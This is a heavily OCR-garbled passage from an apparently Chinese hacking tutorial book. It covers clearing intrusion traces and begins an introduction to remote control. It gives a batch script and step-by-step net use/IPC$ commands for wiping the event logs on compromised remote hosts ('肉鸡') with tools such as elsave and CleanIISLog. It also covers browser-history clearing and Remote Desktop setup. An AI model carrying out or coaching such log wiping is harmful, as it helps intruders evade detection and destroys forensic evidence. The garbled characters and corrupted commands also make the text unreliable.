缀 字符 ， 表 示 执 行 时 本 行 在 命令 行 或 DOS 里 面 不 显示 。 另 外 ，del 命令 是 删除 
提示 。 文件 命令 。 





2) 新 建 一 个 批 处 理 文 件 clean.bat， 其 具体 内 容 如 下 。 


Qcopy del.bat \%1lc$ 

Qecho 问 肉 鸡 复 制 本 机 的 del .bat.….OK 

OSExEt V1 Tal bat 

Gecho 在 肉鸡 上 运行 del .bat， 清 除 日 志文 件 ..…..OK 





3 ) 假设 已 经 与 肉鸡 进行 了 IPC$ 连 接 ， 则 只 要 在 MS-DOS 命令 提示 和 从 窗口 中 输入 


“clean.bat 肉鸡 IP” 命 令 ， 束 可 以 清除 肉鸡 上 的 日 志文 件 了 。 
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取 > 


m= 
小 [ 全- 攻防 从 入 门 到 精通 


全 人 人 他 
12.3 ”Windows 日 志清 理工 县 


当日 志 为 用 户 记 录 着 系统 所 发 生 的 一 切 的 时 候 ， 用 户 同 样 也 需要 规 冰 管理 日 志 ， 但 是 
庞大 的 日 六 记录 义 令 用 户 不 知 所 撞 ， 需 要 使 用 专门 的 工具 对 日 筷 进 行 分 机 、 汇 总 ， 并 从 日 
志 记 录 中 获取 有 用 的 信息 ， 以 便 针 对 不 同 的 情况 采取 必要 的 措施 。 




















12;3.1 elsave 工具 


elsave 是 一 秋 由 小 榕 制作 的 日 志清 除 工 具 ， 它 不 仅 可 以 清除 本 地 计算 机 的 日 六 ， 还 可 
以 远程 删除 “事件 查看 器 ”中 的 相关 的 日 志 。 

命令 格式 为 “elsave [-SNserver] [-1log] [-F file] [-C] [~-q]”， 其 中 各 个 参数 的 含义 如 下 。 

@ -SNserver: 指定 远程 计算 机 。 

@ -|] log: 指定 日 志 类 型 ， 其 中 ,“application” 为 应 用 程序 日 志 ,“system” 为 系统 日 

志 ，“sSecurity” 为 安全 日 志 。 

@ -F file: 指定 你 存 日 忘 文件 的 路 丛 。 

@ -C: 清除 日 志 操 作 ， 注 意 “-C” 要 大 写 。 

@ -qdq: 把 错误 信息 写 入 日 志 。 

使 用 elsave 工具 删除 远程 主机 中 日 六 的 具体 操作 步骤 曝光 如 下 。 
STEP01: 将 elsave.exe 置 于 E 盘 根 目 录 STEP02: 输入 cmd 命令 

















GE- ， 计算 机 、 新 加 卷 (E:) ， 





了 运行 
组 织 司 打 开 包含 玉 库 中 Y 二 至 
3) ”Windows 将 根据 您 所 输入 的 名 称 ， 为 您 打开 杠 应 的 程序 、 
YY 收藏 卖 立 件 夫 、 立 迟 或 Internet 资源 。 
品 下 载 
是] 点 面 打开 (OO): 
这 晤 IE 访问 上 
PsExec,exe Instsrw,exe elsave.exe 
司库 
Ee 视频 国 : | 
各 | 图 片 站 | 
习 文档 3 L | 
下 载 elsave.exe 文件 后 将 其 解压 到 E 盘 分 区 的 根 目 打开 “运行 ”对 话 框 ， 单 击 “ 确 定 ” 
薄 Ks 输入 cmd 命令 。 按钮 。 
STEP03: ”建立 IPC$ 连 接 STEP04: 清除 日 志 


管理 员 : C:\Windows\system32\cmd.exe | 管理 员 : CWindows\system32\cmd.exe 


Microsoft Windows [hl 本 6.1.?76998] por 
hh 原 权 PF 有 ce> 20069 Microsoft Gorporation., 保留 所 有 权利 | 。 


CssersvJohn>net use \\M92.168.59.128\ipc$ 123 /user:John 


命令 成 功 完成 。 


LUseFrs John> 





在 窗口 中 输入 与 目标 计算 机 建立 1PCS$ 连接 的 命令 ， 输入 “e: ”后 按 依次 输入 清除 应 
然后 按 〈 Enter 》 键 。 (Enter 〉 键 ， 切 换 至 用 程序 、 系 统 和 安全 
E 盘 根 目录 。 日 志 的 命令 。 
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STEP05: ” 断 开 IPC$ 连 接 





节 管理 员 : C\Windows\system32\cmd.exe 


Microsoft Windows [hl 本 6.1.?699] 2 | 
版 权 所 有 cc》2869 Microsoft Corporation。 怪 留 所 有 权利 。 


C:\Users\ohn>net use M92.168.59.128\ipc$ 123 /user:John 

久 令 成 功 完成 。 

C: Nsersvohn>e: 

:\Yelsave -s \M92.168.59.128 -1 “application" -C 

:\>elsave -s \\M92.168.59.128 -1 "system'" -C 

:\Yelsave -s \\M92.168.59.128 -1 "security" 一 C 

:\>net use N92.168.59.128\ipcs 输入 = 目标 计算 机 断 开 IPGS 连接 的 命令 ， 然后 
\\t92.168.59.128、\ipcs 已 经 删除 。 按 (Enter ) 键 。 





认识 IPCS 

IPC$ 是 为 了 实现 进程 间 通 信 而 开放 的 命名 管道 ， 通 过 提供 可 信任 的 用 户 账 
户 和 密码 来 连接 双方 ， 以 建立 安全 的 通道 并 交换 数据 ， 从 而 实现 对 远程 计算 机 
的 访问 。 


提示 





12.3.2 (leatL0gs 工具 


藻 想 清理 系统 日 志 、 安 全 日 志 与 应 用 程序 日 志 ， 也 可 利用 ClearLog 工具 。 访 工具 可 下 
接 进 行 远 程 清 理 ， ene ea en 利用 它 可 以 清理 Windows 的 
一 般 日 志 ， 包 括 系统 日 志 、 安 全 日 六 与 应 用 程序 日 志 。 
learlogs 的 命令 格式 为 : clearlogs [\computername] <-app /sec /-Sys>。 其 中 ， 
-app 表示 应 用 程序 日 志 ，-sec 表示 安全 日 志 ，-sys 表示 系统 日 志 。 
下 面 以 清除 192.168.0.16 主机 上 的 事件 日 志 为 例 上 曝光 具体 的 操作 步 又 。 


STEP01: 将 CleanllSLog.exe 置 于 EE 盘 根 目录 STEP02: 建立 |PC$ 链 接 


























国 管理 员 ; C\Windows\system32\cmd.exe 


~、 : Microsoft Windows [h 本 6-1.?76998] | 
个 包 -| 计算 机 ， 新 加 卷 (E] ， 有 瞩 梭 所 有 “c> 2009 Microsoft Gorporation. 保 留 所 有 和 权 刊 | 


组 织 了 包含 到 库 中 ™ 二 新 建立 件 去 CUsekrsJohn>net use \N92.168.59.128、\ipcs 123 user:John 
命令 成 功 完 成 。 
YY 收藏 夫 
由 下 载 We | | HN E43 
ms | 本 
司 最 近 访 问 


Instsrv.exe elsave.exe CleanllSLog.exe 


“ee 





下 载 CleanllSLog.exe 文件 后 将 其 解压 到 E 盘 分 区 ”在 窗口 中 输入 与 目标 计算 机 建立 1PC$ 连接 的 命令 ， 
的 根 目 录 下 。 然后 按 〈 Enter 〉》 键 。 
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> 





攻防 从 入 门 到 精通 
STEP03: 清除 指定 日 志文 件 STEP04: 断 开 IPC$ 链 接 





= 管理 员 : C;\Windows\system32\cmd.exe 


soft Windows [hk 肥 本 6-1-2699] ee 
风 人 9 Cc> 2809 Microsoft Corporation。 闽 留 杂 有 椒 坏 |。 


CNUses 


Stopping Service w3sSurc - 

机 开本 
Stopping Service msftpsvuc. 
Open Service Failed 一 i18608 


E:NzCleanIISLog CGC: Mindows lindowsUpdate.log . 


---Open File 
ClLeanIISLog Uer @.1,. by fssassin 286061. ll Rights Reserved. 


Stopping Service WwW3sSuc 。 
OQpen Service Failed 一 i18609 
Stopping Service msftpsvc. 


ns | “~192.168.59.128~ipc# -del 


Nt92.168.59.128\ipcs 已 经 删除 。 
---Open File Error cad ek 





输入 清除 关于 所 有 IP 地 址 的 WindowsUpdate.log ”输入 与 目标 计算 机 断 开 IPC$ 连接 的 命令 ， 然 后 按 
文件 的 命令 ， 按 〈 Enter ) 键 。 (Enter 》 键 。 


@® CleanllSLog 使 用 的 局 限 性 


与 elsave 相 比 ，CleanIISLosg 在 使 用 上 有 着 局 限 性 ， 即 CleanIISLog 只 能 在 
提示 。 本 地 计算 机 中 运行 ， 并 且 运 行 该 软件 的 账户 必须 具有 管理 员 权 限 。 





12.4 清除 历史 痕迹 


在 使 用 计算 机 的 过 程 中 ， 系 统 会 将 用 户 在 计算 机 上 的 所 有 操作 都 记录 下 来 ， 用 户 可 以 
方便 地 奋 阅 以 前 的 操作 。 这 些 记录 也 会 被 墨客 利用 ， 为 了 保证 计算 机 的 安 人 全， 需要 定期 请 
理 系统 中 保存 的 各 种 历史 痕迹 。 











12.4.1 清除 网 络 历史 记录 


在 默认 情况 下 ，IE 浏览 器 具有 目 动 记录 的 功能 ， 利 用 该 功能 可 以 将 用 户 输入 的 一 
些 表 单 信息 和 浏览 网 页 等 信息 记录 下 来 ， 这 样 可 以 提高 用 户 浏览 重复 网 页 和 进行 重复 
性 输入 的 效率 ， 但 是 ， 这 也 给 黑客 提供 了 方便 。 下 面 将 介绍 如 何 清除 下 浏览 右 中 的 各 
种 历史 记录 。 

1. 清除 Cookie 和 历史 记录 

用 户 在 访问 网 站 时 ，IE 浏览 占 会 日 动 将 用 户 访问 过 的 网 页 保存 到 系统 的 History 文件 
夹 中 ， 这 样 用 户 束 可 以 通过 该 文件 来 了 解 某 段 时 间 内 的 所 有 浏览 网 页 记录 。 为 了 避免 上 网 
隐私 的 泄露 ， 有 必要 将 访问 网 页 的 历史 记录 清除 。 下 面 介 绍 清除 网 页 Cookie 和 历史 记录 的 
操作 步 又。 
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入 侵 痕 还 清除 技术 


STEP01: 打开 IE 浏览 器 STEP02: 打开 “Internet 选项 ”对 话 框 


打印 [P) Internet 选项 
文件 [F) 芝 


主页 
缩放 ([Z (10036) 若 要 创建 多 个 主页 选项 卡 ， 请 在 每 行 输 入 一 个 地 址 入) 。 


安全 (5) 





将 网 站 添加 到 “开始 ”菜单 (M) 
童 春 下 载 ([N) Ctrl+J 加 从 上 次 会 话 中 的 选项 卡 开始 8) 
加 从 主页 开始 0 


管理 加 载 项 (M) 











= 一 页 在 人 而 o 1 而 (T) 
Fl2 开 点 人 员工 具 (U 有 页 卡 中 的 显示 方式 


转 到 已 国定 的 网 站 [G) 星 除 临时 朗 件 、 历 史记 录 、Cookie、 保 存 的 密码 和 隐 风 表单 信息 。 
站 退出 时 旺 除 浏览 历史 记录 名) 


莱 容 性 视图 设置 (8) 


外 观 


报 后 网 站 站 千代 
Internet 选项 [OO) 


其 丁 Internet|ExplorerlA) 


选择 “工具 ”一 “|nternet 选 项 ”菜单 命令 。 在 “常规 ”选项 卡 下 ， 单 击 “ 浏 览 历 史记 录 ” 选 
组 中 的 “删除 ”按钮 。 














STEP03: 确认 删除 项 目 


删除 浏览 历史 记录 


和 文件， 以 使 你 过 的 网 站 能 够 保 
保 入 全 委 吕 和 加 信件 ， i 


局 临时 Internet 文件 和 网 站 文件 CT) _ 
为 快速 查看 而 悍 存 的 网 克 、 图 像 和 媒体 的 副本 


Gd D1 中国 、 经 。 | 3 [1 Sy ) 生 : ~ 
et 8 而 存储 在 你 计算 机 上 的 色 选 “Cookie 和 网 站 数据 ”“ 历 史记 录 ” 等 复 选 


加 历史 记录 0 
已 访 亲 4 站 的 列表 。 





可 下 载 历 史记 录 (1) 
信件 的 列表 。 





加 | 表单 元 据 好) 
悍 存 在 表单 中 键入 的 信息 。 
器 密码 全 ) 
a dd et 








护 、ActiveX 入 o Hot Track”™ 
和 a er / 
剖 单 击 “删除 ”按钮 ， 即 可 清除 保存 在 网 页 中 的 


关 王 帅 剑 浏 监 历史 记录 Cookie 和 历史 记录 等 。 








2. 清除 表单 和 密码 记录 

在 默认 的 情况 下 ， 下 浏览 器 是 局 用 “ 目 动 完成 ”功能 的 该 功能 极 大 地 方便 了 用 户 快速 
输入 相同 的 内 容 ， 但 黑客 也 会 利用 保存 的 用 户 名 和 密码 信息 来 锁 取 用 户 的 数据 。 从 安全 角 
度 出 发 ， 需要 清除 表单 并 取消 自动 记录 表单 的 功能 。 清除 下 浏览 占 中 表单 的 具体 操作 步 又 
nT 





























| 











取 Pe We 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP01: 打开 “nternet 选项 ”对 话 框 STEP02: 打开 “自动 元 成 设置 ”对 话 框 


Internet 选项 自动 完成 设 宫 


常规 安全 隐私 内 容 连接 程序 站 局 让 次 风 。 EE 会 到 出 可 能 你 以 前 键入 或 访问 的 条 目 相 
站 上 中 元 成 功能 应 用 于 
只 控制 可 查看 的 Internet 内 容 。 唱 家 庇 安 全 (F) el ee Bu 用 
辣 地 址 栏 


使 用 加 密 巡 接 和 标识 的 证 书 ee 
en Tb © | 收藏 来 0 











天 源 四 
司 用 Windows 搜索 落得 更 


一 URL 输入 联想 
同志 单 ) 
源 和 网 页 快讯 回 人 De G) 


re 


畜 晰 负 Or el 











在 “内 容 ” 选 项 卡 “自动 完成 ”选项 组 中 单 击 “ 设 ” 国 取消 久 选 国 单 击 “确定 " 按 国 单 击 “ 弄 除 





置 ”按钮 。 所 有 的 复 选 钮 ， 即 可 取消 保存 自动 完成 历史 记 
框 。 地 址 栏 等 内 容 。 ” 录 ” 按钮 。 


STEP03: 清除 以 前 的 表单 和 密码 记录 


删除 浏览 认 史 记录 


| 的 本 用 时 文件 ， 以 使 你 收藏 的 网 站 能 抽 保 
Dokle nternet a 
公 山 好 中 贡生 提高 牙科 器 乱 = 


门 临时 Internet 文件 和 网 站 文件 Cr) _ 
为 快速 查看 而 保存 的 网 由 、 图 舟 和 媒体 的 副本 


辐 Cookie 和 网 站 数据 (0 
同和 性 能 而 存 请 在 你 计算 机 上 的 





站 历史 记录 0 
已 访 j 吉 站 的 列表 。 


[| 下载 历史 记录 QW) 
你 已 下 载 的 文件 的 列表 。 


表单 数据 F) 
保存 在 表 单 中 键入 的 信息 。 


密码 全) 
gna 自动 填充 保存 的 密码 。 





护 、 太 ctive ij 庆 0 Hotit Track 


喧 Task 束 所 负 
i a 
单 击 “ 删 除 ”按钮 ， 即 可 删除 以 前 保存 的 表单 和 窗 


关于 遇险 浏 览 历史 记录 | 码 记录 。 


3. 清除 已 访问 链接 颜色 

当 单 击 网 页 上 的 一 个 链接 后 ， 该 链接 融会 变 成 另外 一 种 颜色 ， 以 标识 该 链接 被 访 
问 过 ， 这 样 可 以 避免 重复 访问 访问 过 的 链接 。 但 不 同 颜色 的 链接 也 会 导致 用 户 隐 私 泄 
露 ， 因 为 它 很 明显 地 标识 出 用 户 访问 过 的 网 页 。 清 除 网 页 中 已 访问 链接 颜色 的 具体 操 
作 步 又 如 下 。 




















2 2 








STEP01: 打开 “Internet 选项 ”对 话 框 


Internet 选项 
常规 “| 安全 | 隐私 | 内 容 | 连接 | 程序 | 高 级 
主页 | 
人 若 要 创建 备 个 主页 选项 卡 ， 请 在 每 行 输入 一 个 地 址 RR) 。 
” httpy/hao.360.cn/2z1002 ^ 








[使 用 当前 页 CC) | | 使用 默认 值 外) | 使 用 新 选项 卡 名 ] 








颜色 0) |] [ 语言 0) | | 字体 后 辅助 功能 EE) 





在 “常规 ”选项 卡 中 单 击 “辅助 功能 ” 
按钮 。 
STEP03: 返回 “|nternet 选项 ”对 话 框 


| ~ | 
Internet 选项 | 9 | 


常 栅 ”安全 | 隐私 | 内 容 | 连接 | 程序 | 高 级 








名 从 上 次 会 话 中 的 选项 卡 开始 B) 
加 从 主页 开始 0 
选 硕 卡 
更 忆 网 页 在 选项 卡 中 的 显示 方式 。 
浏览 历史 记录 
暗 队 临时 文件 、 历 史记 录 、Cookie、 保存 的 密码 和 网 页 志 单 信息 。 
回 退出 时 量 除 浏览 历史 记录 的) 


I [和 有] 














单 击 “ 颜 色 ” 按 钮 。 


STEP05: 选取 顾 色 


ee 


S 国 硬 面 司 司 司 
TIT 


中 
下 
i 
nn 
和 
本 硬 面 面 
i 


有 





选中 一 种 颜色 后 单 击 “ 确 定 ”按钮 。 











入 侵 痕 还 清除 技术 


STEP02: 打开 “辅助 功能 ”对 话 框 


格式 化 
口 忽略 网 页 上 指定 的 颜色 CC) 
门 忽 略 网 页 上 指定 的 字体 样式 G 
门 她 略 网 页 上 指定 的 字号 上) 


用 户 样式 到 
回 使 用 样式 到 编排 文档 格式 上) 
样式 直人 





浏览 (BY)... 





国 取消 勾 选 所 有 ” 辆 单 击 “确定 ” 
的 复 选 框 。 按钮 。 


STEP04: 打开 “ 顾 色 ”对 话 框 


[| 使 用 悬 停 颜色 岂 ) 
颜色 


站 合用 Windows 颜色 Ww 
六 字 红 ): | 
有 景 @B): 
访问 过 的 过) : 上 E 
未 访问 的 8): a 
县 恒 0): 


单 击 色 块 


STEP06: 清除 已 访问 链接 闫 色 


[| 使 用 悬 停 颜 色 00 


颜色 
回 使 用 Windews 颜色 的 ) 


训 字 (LL): El 
背景 6B): CO| 


访问 过 的 区) 
未 访问 的 定 ) 
悬 信 @@) : 


注意 将 “访问 过 的 ”和 “未 访问 的 ” 设 
置 为 同样 颜色 。 
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FF 天 一 


合 人 他 他 


12.4.2 ”使 用 Windows 优化 大 师 进 








信用 Windows 优化 大 师 可 有 效 帮 助 用 户 了 解 目 己 的 计算 机 软 使 件 信 息 ; 


> 
攻防 从 入 门 到 精通 





清理 





还 可 以 清理 系 








2 六 运 


统 运 行 时 产生 的 垃圾 、 修 复 系 统 故障 及 安全 漏洞 ， 从 而 维护 系统 的 正 间 运转 。 





合用 Windows 优化 大 师 删 除 各 种 历史 记录 的 共 体 操作 步 


STEPO1: 


打开 “Windows 优化 大 师 ” 







欢迎 使 用 优化 大 师 ! 请 跟着 我 们 一 步 步 让 自己 的 电脑 进入 最 佳 状态 。 


版 本 : V7.99.12.130 
系统 : Microsoft Windows 7 Ultimate (SP1) 

CPU': 英特尔 Pentium Dual-Core E6300 @ 2.80GHz 
内 存 ; 4 GB ( 人 金 士 预 DDR3 1333 MHz ) 

硬盘 ; 500GB (到 祭 114.05GB) 










第 一 步 . 自动 优化 
一 硅油 俯 各 项 系统 参数 ,使 其 与 当前 电 及 更加 匹配 . 三 二 
SA。 第 二 上 .清理 垃圾 文件 
一 坊 清 理 硕 备 中 的 垃圾 文件 ， 释放 更 多 的 可 用 空间 ， 
光 第 三 步 . 博 理 历史 病 这 
一 娠 清理 历史 癌 迹 ， 保 护 隐私 ， 也 使 系统 更 加 清 突 。 
和 
一 舌尖 有 注册 地 中 的 刀剑 信息 , 为 系统 进一步 提速， 










系统 检测 
系统 优化 





系统 清理 
系统 维护 





查看 Windows 优 化 大 师 的 各 个 功能 。 


STEP03: ”查看 扫描 历史 浪迹 


田 贺 优 Internet Explorer 历史 记录 清理 
田 国 埠 FireFox 历 安 记录 清理 
可 国 总 Opera 历 安 记录 清理 
田 辆 因 Google Chrome 历 安 记录 清理 
日 于 斋 Windows 使 用 痕迹 
园 多 运行 对 活 框 历史 记录 
回 户 最 后 支行 的 程序 历史 记录 
回 GD 文件 打开 与 保存 历史 记录 
回 加 窗口 位 置 与 大 小 历史 记录 
~ ea 章 找 计算 机 历史 记录 





| | 四 D5 104[1]jpg 
LL followpu blic[1].htm 


D:\l\internet 临时 文件 \Content.IE5YEIGEDNO\104[1]Jpg 
D:\i\Nnternet 临时 文件 \Content.1E5\8DOYG33X\followpublic[],htm 
Di\l\Internet 临时 文件 \Content.IE5\NLY2M8Y1\1[3]jpg 
Di:\1\internet 临时 文件 \Content,IE5\8DOYG33X\followPublic[2],htm 
D:\1\internet 临时 文件 \Content.IE5\NLY2M8Y1\app.iso.monitor[1]js 
Di\1\internet 临时 文件 \Content.IE5\7MB8BF80Nso.ui[ll,css 
DANIVinternet 临时 文件 \Content.IE5WEIGEDNONWv3204b5[1].css 
D:\1\internet 临时 文件 ,ContentIE5S\CAKOUH2NVcomment[l]Js 
D:\1\internet 临时 文件 ,ContentIE5\7MB8BF80Nbubble[1js 
DANlNinternet 临时 文件 \Content.IE5\CAKOUH2NA\resukt[1].js 
Di\l\Internet 临时 文件 \Content.IE5\7MB8BF80\app.iso[1]js 
D:\l\Internet 临时 文件 \Content.IE5\R1RXZL59\suggest[1].js 
D:\1\Internet 临时 文件 \Content.IE5\C3PUN2R3\suggest[2]Jjs 


BE Biso.uill].css 
和 #4 BB |v3204b5[l].css 
9| | comment[l]js 
9 回 #\ bubble[1]js 


9 ls)app.iso[ll]js 
9 着 ] suggest[1].Js 
田 贺 李 suggest[2]j ys 





正在 分 析 IF 绎 存 : 有 临时 文件 \Content. IE5\JEIGFDNO\new_mmba01[1].|eif 


在 扫描 的 过 程 会 将 扫描 结果 显示 在 列表 中 ， 待 扫描 
结束 后 ， 单 击 “ 全 部 删除 ”按钮 。 
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又 如 下 。 


理 ” 窗 口 


STEP02: 打开 “历史 痕迹 清 


er 0 
默认 
E 
也 辆 总 Internet Explorer 历史 记录 清理 
忆 贺 芝 FireFox 历史 记录 清理 E 删除 
全 部 出 除 
i 使 用 癌 迹 
如 运行 对 话 框 历史 记录 帮助 


88 最 所 E 行 的 程序 历 实 记录 

加 文件 打开 与 保存 历 实 记 录 

本 | 窗口 位 置 与 大 小 历史 记录 

少 坦 拭 计算 机 历史 记录 

国 最 5 使 用 的 文档 历史 记录 = 


















十 
司 同 同 同 同 加 夯 








[人 兄 祭 DLL 清理 
可 | 软件 智能 印 载 





[@ | |@ mm | 








国志 单 击 “ 系 国 选择 
统 清理 ”“ 历 史 痕 扫描 的 项 目 。 
迹 清理 ”。 


STEP04: 删 F 


国 单 击 “扫描 / 
按钮 ， 即 开始 扫 
描 。 


余 历 史记 录 


Windows 优 化 大 师 


说 明 : Windows 优 化 大 是 棒 要 出 除 所 有 扫 洪 到 的 历史 记录 癌 迹 ， 确定 
喇 ? 





单 击 “ 确 定 ” 按 钮 ， 删 除 扫描 的 全 部 历史 记录 。 


本 章 上 曝光 几 个 远程 控制 的 攻击 实例 ， 如 使 用 灰 铝 子 进行 远程 控制 、 利 用 任 
我 行 软件 进行 远程 控制 、 使 用 远 控 王 控制 计算 机 、 使 用 网 络 人 进行 远程 控制 等 


O 〇 远程 桌面 连接 与 协助 
O 用 WinShell 实现 远程 控制 
O 用 QuickIP 进行 多 点 控制 





> 


Py 
全- 攻防 从 入 门 到 精通 


13.1 ”认识 远程 控制 


远程 控制 一 般 指 通 过 网 络 控制 远 端 计算 机 。 当 操作 者 使 用 主 控 端 计算 机 控制 被 控 端 计 
算 机 时 ， 残 如 同 坐 在 被 控 端 计算 机 的 屏 硕 前 一 样 ， 可 以 局 动 被 控 问 计算 机 的 应 用 程序 ， 可 
以 使 用 或 镭 取 被 探 闹 计 算 机 的 文件 ， 其 全 可 以 利用 被 控 问 计算 机 的 外 部 打印 设备 (打印机) 
和 通信 设备 (调制 解 调 器 或 者 专线 等 ) 来 进行 打印 和 访问 外 网 及 内 网 ， 就 像 利 用 遥控 问 遥 
控 电 视 的 音量 、 变 换 频 道 或 者 开关 电视 机 一 样 。 





























13.1.1 远程 控制 的 技术 发 展 经 历 


计算 机 中 的 远程 控制 技术 始 于 DOS 时 代 ， 只 不 过 由 于 当时 技术 上 没有 什么 大 的 变化 ， 网 
络 不 发 达 ， 市 场 没 有 更 高 的 要 求 ， 远 程控 制 技术 没有 引起 更 多 人 的 注意 。 但 是 ， 随 着 网 络 的 高 
度 发 展 ， 计 算 机 的 管理 及 技术 支持 的 需要 ， 远 程 操作 及 控制 技术 越 来 越 引起 人 们 的 关注 。 

远程 控制 一 般 支 持 以 下 网 络 方式 : LAN、WAN、 拨号 方式 及 互联 网 方式 。 此 外 ， 有 的 远程 
控制 软件 还 支持 通过 串口 、 并 口 、 红 外 端口 来 对 远程 计算 机 进行 控制 (不 过 ， 这 里 说 的 远程 是 
有 限 距 离 郊 围 内 的 计算 机 )。 传统 的 远程 控制 软件 使 用 NETBEUI、 NETBIOS、 IPX/SPX、TCP 
等 协议 来 实现 远程 控制 ， 不 过 ， 随 看 网 络 搁 术 的 发 展 ， 很 多 远程 控制 软件 提供 通过 Web 页 面 以 
Java 技术 来 控制 远程 计算 机 ， 这 样 可 以 实现 不 同 操作 系统 下 的 远程 控制 。 

















全 .人 远程 控制 的 技术 原理 


远程 控制 是 在 网 络 上 由 一 台 计 算 机 ( 主 控 端 Remote/ 客 户 端 ) 远 距 离 控 制 男 一 台 计 算 
机 被 控 闹 Host/ 服 务 器 问 ) 的 技术 ， 主 要 通过 远程 控制 软件 实现 。 

远程 探 制 软 件 一 般 分 为 客户 端 程序 (Client) 和 服务 器 端 程序 (Server) 两 部 分 ， 通 第 
将 客户 问 程 序 安装 到 主 控 问 的 计算 机 上 ， 将 服务 占 新 程序 安装 到 被 探 新 的 计算 机 上 上。 使 用 
时 ， 客 户 端 程序 癌 被 控 端 计算 机 中 的 服务 喜 问 程序 发 出 信号 ， 建 立 一 个 特殊 的 远程 服务 ， 
然后 通过 这 个 远程 服务 ， 使 用 各 种 远程 控制 功能 发 送 远程 控制 命令 ， 控 制 被 控 端 计算 机 中 
的 各 种 应 用 程序 运行 。 


























全. 人 远程 控制 的 应 用 


随 着 远程 控制 技术 的 不 断 发 展 ， 远 程控 制 也 被 应 用 到 教学 和 生活 当中 。 下 面 简单 介绍 
远程 控制 的 儿 个 常见 应 用 方 问 。 

1. 远程 教育 

利用 远程 技术 ， 商 业 公 司 可 以 实现 和 用 户 的 远程 交流 ， 采 用 交互 式 的 教学 模式 ， 通 过 
实际 操作 来 培训 用 户 ， 使 用 户 从 技术 支持 专业 人 员 那 里 学 习 示 例 知识 变 得 十 分 容易 。 而 教 
师 和 学 生 之 间 也 可 以 利用 这 种 远程 控制 技术 实现 教学 问题 的 交流 ， 学 生 不 用 见 到 老师 ， 就 
得 到 老师 手把手 的 辅导 和 讲授 。 学 生还 可 以 直接 在 计算 机 中 进行 习题 的 演算 和 求解 ， 在 此 
过 程 中 ， 教 师 能 够 轻松 看 到 学 生 的 解 题 思路 和 步骤 ， 并 加 以 实时 的 指导 。 
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2. 远程 办 公 

这 种 远程 的 办 公 方 式 不 仅 大 大 缓解 了 城市 交通 状况 ， 减 少 了 环境 污染 ， 还 免 去 了 人 们 
奔波 的 辛劳 ， 更 可 以 提高 企业 员工 的 工作 效率 和 工作 兴 

3. 远程 协助 

任何 人 都 可 以 利用 一 技 之 长 通过 远程 控制 技术 为 远 病 计 算 机 前 的 用 户 解决 问题 。 如 安 
小 和 配置 软件 、 绘 画 、 填 写 表 单 等 协助 用 户 解 决 问题 。 

4. 远程 维护 

计算 机 系统 技术 服务 工程 师 或 管理 人 员 通 过 远程 控制 目标 维护 计算 机 或 所 需 维 护 管 理 的 网 
络 系统 ， 进 行 配 置 、 安 闭 、 维 护 、 监 控 与 管理 ， 解 决 以 往 服 务工 程 师 必 须 杀 临 现场 才能 解决 的 问 
题 , 大 大 降低 了 计算 机 应 用 系统 的 维护 成 本 , 最 大 限度 地 减少 了 用 户 损 失 , 实现 高 效率 、 低 成 本 。 


13.2 ”远程 朱 面 连接 与 协助 


远程 更 面 采 用 了 一 种 类 似 Telnet 的 技术 ， 远 程 吕 面 连接 组 件 是 微软 公司 从 Windows 
2000 Server 开始 提供 的 ， 用 户 只 需 通 过 简单 设置 即 可 开局 Windows XP、Windows 7 和 
Windows 8 系统 下 的 远程 更 面 连接 功能 。 

当 某 人 台 计 算 机 开局 了 远程 果 面 连接 功能 后 ， 其 他 用 户 束 可 以 在 网 络 的 另 一 端 控制 这 人 台 
计算 机 了 ， 可 以 在 该 计算 机 中 安 猜 软件 、 运 行程 序 ， 所 有 的 一 切 都 好 像 是 直接 在 该 计算 机 
上 操作 一 样 。 通 过 该 功能 ， 网 络 管理 员 可 以 在 家 中 安全 地 控制 单位 的 服务 器 ， 而 且 由 于 该 
功能 是 系统 内 置 的 ， 所 以 比 其 他 第 三 方 远程 控制 工具 使 用 更 方便 、 有 灵活 。 


13.2.1 Windows 系统 的 远程 朱 面 连接 


远程 加 面 可 让 用 户 可 徘 地 使 用 远程 计算 机 上 所 有 的 应 用 程序 、 文 件 和 网 络 资源 ， 束 如 
同 用 户 本 人 华 在 远程 计算 机 前 一 样 。 不 仅 如 些 ， 本 地 (办公室) 运行 的 任何 应 用 程序 在 用 
户 使 用 远程 加 面 远程 家、 会 议 室 、 途 中 ) 连接 后 仍 会 运行 。 

在 Windows 7 系统 中 保留 了 远程 果 和 而 连接 功能 ， 以 实现 请 专家 远程 控制 ， 帮 助 用 户 解 
决 计算 机 的 问题 。 如 末 需 要 实现 远程 加 面 连接 功能 ， 可 按 如 下 操作 进行 设置 。 




















































































































a 4 » /六 > 66 > 
STEP01: 打开 “控制 面 向 口 STEP02: 打开 “系统 ” 界 
| Xx 
(四 - 辐 控制 面板 ”所 有 控制 面板 项 》 | D| 利己 -| ， 控制 面板 ， 所 有 控制 面板 项 》 ”| 分 | 闫 二 六 友 
文件 (中 ”编辑 (E) ” 查 春 (V) 工具 (T) 帮助 (H) 文件 (日 ”编辑 (E) ” 棕 者 (V) 工具 (T) 帮助 (H) 
调整 计算 机 的 设置 查看 方式 ”大 图 标 > sa 查看 有 关 计 算 机 的 基本 信息 
( 由 高 言 了 后 标 Windows 版 本 
Windows 7 旋 舰 版 
是 索引 选项 了 通知 区 域 图 标 号 系 缚 全 护 版 权 所 有 合 2009 Microso 
A 革 21E 上 : 国 高 绝 系 统 Corporation。 保 置 所 有 权利 。 
AN 二 ~ 了 有 Ih 
(®y 同步 中 心 和 网络 和 共享 中 心 
站 位 置 和 其 他 传感器 有 文件 夹 选 项 
‘a 0 图 显示 | | 造 商 : Microsoft 
=| | 号 : Ghost 7(SP1T) 电 及 公司 法 机 旗 疝 版 v2012.01 
辆 性 能 信息 和 工 呈 - 团 颜色 管理 | jb 分 级; 系统 分 级 不 可 用 
a 器 Pentium (R) Dual-Core CPU E6300 
[| 册 全 难 知 答 负 、 用 户 帐户 I 6 | 
Ee 安 RAMNY: 40n GB 9n_ GB 51 辕 





在 “所 有 控制 面板 ”窗口 中 单 击 “ 系 统 ” 选项。 单 击 左 侧 的 “远程 设置 ”链接 。 
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> 





攻防 从 入 门 到 精通 





STEP03: 系统 属性 设置 


勾 选 “允许 用 
户 远程 连接 这 人 台 
计算 机 ” 复 选 框 。 车 想 成 功 建立 

人 远程 控制 连接 ,由 


计算 机 名 | 硬件 | 高 级 || 系统 保护 


国 单 击 “ 选 择 用 | 提示 对 方 也 应 勾 选 此 复 
户 ” 按钮 , 添加 需 选 框 ， 

要 进行 远程 连接 
但 不 在 本 地 管理 员 
